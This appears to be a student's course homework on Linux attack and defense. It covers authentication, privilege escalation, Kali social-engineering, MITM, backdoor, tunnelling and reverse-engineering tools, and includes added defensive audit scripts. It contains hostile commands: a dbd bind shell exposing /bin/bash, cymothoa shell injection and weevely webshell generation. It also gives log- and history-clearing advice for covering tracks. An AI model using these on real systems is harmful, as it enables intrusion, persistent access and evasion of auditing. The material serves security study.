2017-2018-2 20179306 "Network Attack and Defense Technology" Week 8 Homework

Chapter 8 Security Attack and Defense of Linux Operating System

1.1 Overview of the basic framework of the Linux operating system

1.1.1 Development and Status Quo of Linux Operating System

On the basis of the unified kernel code base, the Linux open source community has also developed a large number of distributions for the needs of different user groups; popular ones include Ubuntu, Debian, Fedora, CentOS, RHEL, openSUSE and Slackware. The reason Linux has become one of the most widely followed operating systems is that it is open source and free.

1.1.2 Advantages of Linux

① Cross-platform hardware support (most of the Linux kernel is written in C, and it adopts the portable UNIX standard application programming interface)

② Rich software support

③ Multi-user, multi-tasking (multiple users can use the computer system at the same time over network connections)

④ Reliable security (using Linux's own firewall, intrusion detection, security authentication and other tools, and patching system vulnerabilities in time, can greatly improve the security of a Linux system)

⑤ Good stability (the Linux kernel source code is optimized for a standard 32-bit computer (64-bit on a 64-bit CPU) to ensure the stability of the system)

⑥ Complete networking functionality

1.1.3 Linux system structure

A complete operating system based on the Linux kernel is called a Linux operating system. Its structure includes the Linux kernel, GNU runtime libraries and tools, a command-line shell, the X Window graphical interface with a corresponding desktop environment, and thousands of applications ranging from office suites, compilers and text editors to scientific tools and web services. The Linux kernel has a typical monolithic (macro-kernel) structure, not the micro-kernel structure adopted by Minix, the precursor of Linux. In the Linux kernel, the device drivers in the hardware abstraction layer have full access to hardware devices, are easily built in modular form, and can be loaded or unloaded while the system is running through the LKM (loadable kernel module) mechanism. Above the hardware abstraction layer are the kernel service modules, comprising five subsystems: process management, memory management, file system, device control and networking. These kernel modules provide services through the system call interface to the user-mode GNU runtime libraries, tools, command-line shell, X Window system and application software.

1.2 Security Mechanism of Linux Operating System

1.2.1 The core security mechanism of the Linux operating system

Authentication, authorization and access control, and security auditing.

1.2.2 Linux Authentication Mechanism

Linux is a multi-user, multi-tasking operating system. It implements user identity management by creating users and user groups of various role types, so that multiple users can use the system safely.

1.2.3 Linux users

In a Linux system, the user is the subject that runs processes to carry out specific tasks. There are three kinds: ① the root user, ② ordinary users and ③ system users. Linux user information is stored in the system's /etc/passwd file, including the username, a uid unique to each user, the shell used, the user's home directory and so on. The encrypted password is stored in the /etc/shadow file, which is readable only by root.

1.2.4 Linux User Group

A Linux user group is a collection of user accounts with the same characteristics, used to simplify rights management for the whole system. Group information is stored in the system's /etc/group file, including the group name, the group's gid and the list of usernames belonging to the group; the group's encrypted password is stored in /etc/gshadow. You can use the id -a command to display the groups the current user belongs to, add a group with the groupadd command, and use usermod -G group_name username to add a user to a specific group.
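As an added audit example for the two passages above (not code from the page or from any Linux distribution), the following parses the /etc/passwd and /etc/group record formats and flags what an administrator checks first: extra uid-0 accounts, duplicate uids, system accounts with a login shell, and members of privileged groups. The sample file contents are constructed, and the "uid below 1000 is a system account" rule is the Debian convention assumed here.

```python
# Added audit example: parse /etc/passwd and /etc/group records and flag
# entries that matter for authentication and access control.
# SAMPLE_PASSWD / SAMPLE_GROUP are constructed, not from a real system.
PRIVILEGED_GROUPS = ("root", "sudo", "wheel")
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}

def parse_passwd(text):
    """Parse name:x:uid:gid:gecos:home:shell lines into a list of dicts."""
    users = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, uid, gid, _gecos, home, shell = line.split(":")
        users.append({"name": name, "uid": int(uid), "gid": int(gid),
                      "home": home, "shell": shell})
    return users

def parse_group(text):
    """Parse name:x:gid:member1,member2 lines into {name: (gid, members)}."""
    groups = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":")
        groups[name] = (int(gid), {m for m in members.split(",") if m})
    return groups

def audit(passwd_text, group_text):
    """Return human-readable findings about risky accounts and memberships."""
    findings, seen_uid = [], {}
    for u in parse_passwd(passwd_text):
        if u["uid"] == 0 and u["name"] != "root":
            findings.append(f"extra uid-0 account: {u['name']}")
        if u["uid"] in seen_uid:
            findings.append(f"duplicate uid {u['uid']}: {seen_uid[u['uid']]} and {u['name']}")
        seen_uid.setdefault(u["uid"], u["name"])
        # Debian convention (assumed): uids below 1000 are system accounts, no login shell
        if 0 < u["uid"] < 1000 and u["shell"] not in NOLOGIN_SHELLS:
            findings.append(f"system account with login shell: {u['name']} ({u['shell']})")
    groups = parse_group(group_text)
    for gname in PRIVILEGED_GROUPS:
        for member in sorted(groups.get(gname, (None, set()))[1]):
            findings.append(f"{member} is a member of privileged group {gname}")
    return findings

SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/bash
toor:x:0:0::/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
"""
SAMPLE_GROUP = "root:x:0:\nsudo:x:27:alice\nwww-data:x:33:\n"
```

Running audit(SAMPLE_PASSWD, SAMPLE_GROUP) reports the toor account twice (extra uid 0 and duplicate uid), the www-data login shell, and alice's sudo membership.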

1.3 Linux system remote attack and defense technology

1.3.1 The main methods of invading Linux systems on remote networks

① Guessing attacks on the user passwords involved in the authentication process of the Linux system's various network services

② Discovering and exploiting a security vulnerability in a listening network service on the Linux system, giving the attacker access to a local shell

③ Web Trojans, fraudulent e-mail, Trojan programs and other technical and social-engineering means

④ When the Linux system is used as a router connecting multiple networks, or a network sniffer in "promiscuous mode" is running on it, it may be attacked with packets specially crafted by the attacker, so that the attacker obtains access rights.

1.3.2 Automated remote password guessing tools

① Brutus: known as the fastest and most flexible remote password guessing and cracking tool

② THC Hydra: a very fast network authentication password guessing and cracking tool

③ Cain and Abel: the tool nicknamed "Black Realm God Soldier"; it also has very good support for remote password guessing against SSH under Linux and against various network application services

1.3.3 Linux network service remote penetration attack

This section covers: Linux system security vulnerabilities, penetration attacks and the patch update process; remote penetration attacks on Linux network services; the network protocol stack in the Linux kernel; the network services in the LAMP web site stack; FTP, Samba and other file sharing services; e-mail sending and receiving services; and other network services.

1.3.4 Security precautions against network service remote penetration attacks

① Disable all unnecessary network services

② Choose more secure network protocols and service software where possible, and deploy them following security best practices

③ Update network service versions in time

④ Use xinetd and a firewall to add network access control for Linux network services

⑤ Establish an intrusion detection and emergency response planning process

1.4 Local Security Attack and Defense Technology of Linux System

1.4.1 Linux Local Privilege Escalation

When root privileges are needed to configure and manage the system, the su or sudo command is used to switch to the root account. After an attacker gains access as a limited local user, the easiest way to escalate privileges is to crack the root user's password and then run su or sudo. Reading the password hash file /etc/shadow itself requires root privileges, but by exploiting an arbitrary file read/write vulnerability in a service running as root an attacker can still obtain /etc/shadow first and then become root by cracking the password. The second way to escalate privileges is to discover and exploit security holes in the su or sudo programs themselves. The most popular way for attackers to escalate local privileges on Linux is to attack arbitrary code execution vulnerabilities in programs running with root privileges directly, so that the program opens a root shell for the attacker. Depending on the type of target program, this approach is divided into attacking user-mode SUID privilege escalation vulnerabilities and attacking Linux kernel code privilege escalation vulnerabilities: network services running as root and user-mode programs with the SUID bit set run with the privileges of the file owner while executing, in order to perform operations on system resources. The last local privilege escalation technique takes advantage of misconfigurations in the system: by searching for sensitive files and directories that are globally writable and exploiting them, an attacker who holds only a limited user's privileges can get the operating system or privileged programs to do something they do not expect, and thereby gain an opportunity for privilege escalation.
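The defensive counterpart of the last two techniques above is a regular audit for exactly those misconfigurations. The following is an added example (not from the page): it walks a directory tree and reports world-writable files, world-writable directories without the sticky bit, and set-uid executables, skipping symlinks so a link cannot redirect the check. It builds a small constructed temporary tree for demonstration rather than scanning a real system.

```python
# Added audit example: find the misconfigurations the paragraph names
# (world-writable files/directories and set-uid executables) in a tree.
# build_demo_tree() creates a constructed temporary tree, not a real system.
import os
import stat
import tempfile

def scan_tree(root):
    """Walk root and return misconfigured paths relative to root, sorted."""
    world_writable, setuid = [], []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode        # lstat: never follow symlinks
            if stat.S_ISLNK(mode):
                continue
            rel = os.path.relpath(path, root)
            # a world-writable directory is acceptable only with the sticky bit (like /tmp)
            sticky_dir = stat.S_ISDIR(mode) and mode & stat.S_ISVTX
            if mode & stat.S_IWOTH and not sticky_dir:
                world_writable.append(rel)
            if stat.S_ISREG(mode) and mode & stat.S_ISUID and mode & stat.S_IXUSR:
                setuid.append(rel)
    return {"world_writable": sorted(world_writable), "setuid": sorted(setuid)}

def build_demo_tree():
    """Create a constructed tree with one example of each case; return its root."""
    root = tempfile.mkdtemp(prefix="linux_audit_demo_")
    dirs = {"tmp": 0o1777, "opt/app": 0o777, "etc": 0o755, "usr/bin": 0o755}
    for rel, mode in dirs.items():
        os.makedirs(os.path.join(root, rel))
        os.chmod(os.path.join(root, rel), mode)   # chmod after makedirs, so umask does not interfere
    files = {"etc/app.conf": 0o666, "usr/bin/helper": 0o4755, "usr/bin/tool": 0o755}
    for rel, mode in files.items():
        path = os.path.join(root, rel)
        with open(path, "w") as fh:
            fh.write("# constructed sample file\n")
        os.chmod(path, mode)
    return root

if __name__ == "__main__":
    print(scan_tree(build_demo_tree()))
    # prints {'world_writable': ['etc/app.conf', 'opt/app'], 'setuid': ['usr/bin/helper']}
```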

1.4.2 Covering tracks on a Linux system

Clean up the system logs to erase the traces of your actions. Check the contents of /etc/syslog.conf to see which types of audit events the system currently records and where the logs are stored. Also clear the history of commands entered in the shell.

Kali Video Learning (31-35)

Exploitation with SET

The Social Engineering Toolkit (SET) is an open-source, Python-driven social engineering penetration testing tool that provides a very rich library of attack vectors; it is usually used together with Metasploit.

Enter 1 and press Enter; the menu shows:

1. Spear phishing attacks

2. Website Attack

3. Infectious media attack

4. Create Payload and listen

5. Mass email attack

6. Arduino-based attack

7. SMS Spoofing Attack

8. Wireless access point attack

9. QR code attack

10. Powershell attack

11. Third-party modules

Sniffing spoofing and man-in-the-middle attacks

The man-in-the-middle attack procedure under Linux is the same as elsewhere. Below are the steps for ARP spoofing, DNS spoofing and sniffing, and session hijacking.

Enable port forwarding in the Kali settings

Set up sslstrip and let sslstrip listen on port 8081

Configuration of ettercap: the configuration file is /etc/ettercap/etter.conf; first of all, both ec_uid and ec_gid should be changed to 0

In the Linux section further down, uncomment the line for iptables if you use iptables, then save and exit

Open the graphical interface with ettercap -G

Select the default eth0 as the sniffing network card

In ettercap, select Sniff - Unified sniffing - select the network card - Hosts: scan for hosts first, and open the host list after scanning

Privilege maintenance: backdoors

Privilege maintenance includes three subclasses: the Tunnel toolset, web backdoors and system backdoors. System backdoors and web backdoors are collectively referred to as backdoors: malicious programs left behind to make it easy to re-enter the system after penetration testing.

1. WEB backdoor

(1)Weevely

Weevely is a webshell tool written in Python (it integrates webshell generation and connection; it is only for security learning and teaching, and illegal use is prohibited). It can be regarded as the Linux replacement for the "kitchen knife" (China Chopper) client, limited to PHP; some modules are not available on Windows.

Generate a PHP backdoor with weevely generate test ~/1.php, where test is the password; ~/1.php is generated locally.

The backdoor is uploaded to the web server and connected to using weevely.

(2)WeBaCoo(Web Backdoor Cookie)script-kit

WeBaCoo is a small, stealthy PHP backdoor that provides a terminal which connects to a remote web server and executes PHP code. WeBaCoo uses HTTP response headers to transmit command results, and shell commands are base64 encoded and hidden in cookies.

2. System backdoor

(1) Cymothoa system backdoor

cymothoa -p 10500 -s 0 -y 2333 (inject into process 10500, listening on port 2333); if successful, you can connect to port 2333 and get a shell back

(2) dbd can be understood as an encrypted version of nc

Listening side: dbd -l -p 2333 -e /bin/bash -k password

Attacker: dbd 127.0.0.1 2333 -k password

(3) sbd is used in the same way as dbd

(4) U3-Pwn

A tool used in combination with Metasploit payloads; from its menu it can target removable media devices such as optical drive images and USB disks.

(5)Intersect

Run the generated backdoor on the target machine with 1.py -b to create a bind-shell backdoor. If a remote host and remote port were set beforehand, it can also be set up as a reverse shell. Connecting to the backdoor port then returns a shell.

Privilege maintenance: tunnels

Privilege maintenance includes three subclasses: the Tunnel toolset, web backdoors and system backdoors. The Tunnel toolset contains a series of tools for establishing communication tunnels and proxies:

(1) Miredo

Miredo is a network tool mainly used for IPv6 Teredo tunnel links on BSD and Linux. It can give IPv6 connectivity to network connections that do not support IPv6 natively. IPv6 and TUN tunnel support are required in the kernel.

(2)DNS2TCP

A DNS tunnel is, as the name says, a tunnel that uses the DNS query process to transmit data.

In public places such as hotels there is usually a Wi-Fi signal, but when you visit the first website a window may pop up asking for a username and password, and only after logging in can you continue to use the Internet (this is generally a transparent HTTP proxy, a captive portal). However, sometimes the DNS address obtained is still valid and can be used for DNS queries. In that case DNS tunnel technology can be used to get free Internet access.

DNS tunnel principle: through a specific server, let the DNS server in the local network forward data for us. Many tools implement DNS tunnels, for example OzymanDNS, tcp-over-dns, heyoka, iodine and dns2tcp.

(3)iodine

(4)Proxychains

A tool often used in intranet penetration testing. For example, after using Meterpreter to open a Socks4a proxy service, by editing the /etc/proxychains.conf configuration file and adding the proxy, other tools such as sqlmap and nmap can use the proxy directly to scan the internal network.
For example: proxychains nmap 10.0.0.1/24

(5) Proxy tunnel

Proxytunnel can connect to a remote server through a standard HTTPS proxy; it is a proxy that implements a bridging function, specifically for carrying SSH over HTTP(S).
Proxytunnel can be used to:
create a communication channel using an HTTP(S) proxy (the HTTP CONNECT method)
act as a client driver for OpenSSH and create SSH connections over an HTTP(S) proxy
run as a standalone application that connects to remote servers

(6) Ptunnel

Tunnel communication with ICMP packets

(7) Pwnat

Communication via UDP between hosts inside internal networks

(8) sslh
An SSL/SSH port multiplexing tool: sslh can accept HTTPS, SSH and OpenVPN connections on the same port. This makes it possible to reach an SSH server or OpenVPN server through port 443 while still providing an HTTPS service on that port. sslh can be used as an example for studying port multiplexing.
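To make that study concrete, here is an added, simplified re-creation of the idea (not sslh's own code, which is written in C): a connection is classified by the first bytes the client sends and routed to a backend. The backend address table, the sample byte strings and the probe-timeout fallback to SSH (an SSH client may wait for the server banner before sending) are assumptions for illustration.

```python
# Added example of the port-multiplexing idea behind sslh: classify a TCP
# stream by its opening bytes. BACKENDS and SAMPLES are constructed.
HTTP_METHODS = {b"GET", b"POST", b"HEAD", b"PUT", b"DELETE", b"OPTIONS", b"CONNECT"}
BACKENDS = {"ssh": ("127.0.0.1", 22), "tls": ("127.0.0.1", 8443),
            "openvpn": ("127.0.0.1", 1194), "http": ("127.0.0.1", 8080)}

def classify(first_bytes):
    """Return 'ssh', 'tls', 'openvpn', 'http' or None for the opening bytes of a stream."""
    if first_bytes.startswith(b"SSH-"):              # SSH identification string (RFC 4253)
        return "ssh"
    if len(first_bytes) >= 3 and first_bytes[0] == 0x16 and first_bytes[1] == 0x03:
        return "tls"                                  # TLS record: handshake type, major version 3
    # OpenVPN over TCP: 2-byte length prefix, then the opcode in the high 5 bits of the
    # next byte; opcode 7 is P_CONTROL_HARD_RESET_CLIENT_V2, the client's first packet
    if len(first_bytes) >= 3 and int.from_bytes(first_bytes[:2], "big") >= 14 \
            and first_bytes[2] >> 3 == 7:
        return "openvpn"
    if first_bytes.split(b" ", 1)[0] in HTTP_METHODS:  # request line: METHOD SP target
        return "http"
    return None

def route(first_bytes, timed_out=False):
    """Pick the backend; an idle client that sent nothing before the probe timeout
    is assumed to be SSH, since SSH clients may wait for the server's banner."""
    proto = classify(first_bytes)
    if proto is None and timed_out and not first_bytes:
        proto = "ssh"
    return BACKENDS.get(proto)

# Constructed opening bytes for each protocol (and one unknown: a SOCKS5 greeting)
SAMPLES = {
    "ssh client": b"SSH-2.0-OpenSSH_9.6\r\n",
    "tls client hello": b"\x16\x03\x01\x00\xc0\x01\x00\x00\xbc\x03\x03",
    "openvpn hard reset": b"\x00\x0e\x38" + b"\x00" * 11,
    "http request": b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n",
    "socks5 greeting": b"\x05\x01\x00",
}

def demo():
    """Classify every sample; returns {name: protocol or None}."""
    return {name: classify(data) for name, data in SAMPLES.items()}

if __name__ == "__main__":
    for name, proto in demo().items():
        print(f"{name:20s} -> {proto} -> {route(SAMPLES[name])}")
```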

Reverse engineering tools

Reverse engineering means deducing how something is implemented by analysing an existing artifact and its results. For example, if someone else's exe program produces a beautiful animation effect, you can analyse how that effect is implemented through disassembly, decompilation and dynamic tracing; this activity is reverse engineering. It is not only decompilation but also recovering the design and documenting it; the purpose of reverse software engineering is to make the software maintainable.

(1) EDB-Debugger

EDB (Evan's Debugger) is a binary debugging tool developed on Qt4, modelled on OllyDbg. Its functionality can be extended through a plug-in system. Currently only Linux is supported.

(2) OllyDbg

OllyDbg is a classic ring 3 debugger, a dynamic debugging tool that combines the strengths of IDA and SoftICE. Under Kali, OllyDbg runs under Wine.

(3)jad

Java decompilation tool


(4) Radare2

Radare2 is an open source reverse engineering platform that disassembles, debugs, analyses and manipulates binary files.


(5) RecStudio2

A decompilation tool

(6) Apktool

The APK compilation tool provided by Google; it can decompile and recompile an apk, install the framework-res framework needed to decompile system apks, and clean up the folder from the last decompilation.


(7) Clang, Clang++

Clang is a lightweight compiler for the C, C++, Objective-C and Objective-C++ languages, similar to the gcc compiler.

Clang++ is the C++ front end of Clang; its usage is the same, similar to the g++ compiler.


(8) d2j-dex2jar

Converts a dex file into a jar file, so that other tools can then be used to view the source code.


(9) Flasm

Mainly used to directly modify the ActionScript in a swf file. Software that converts swf to fla files cannot guarantee 100% restoration; if you only modify the ActionScript code, flasm is the best choice, because it modifies only the script and not the resource data.
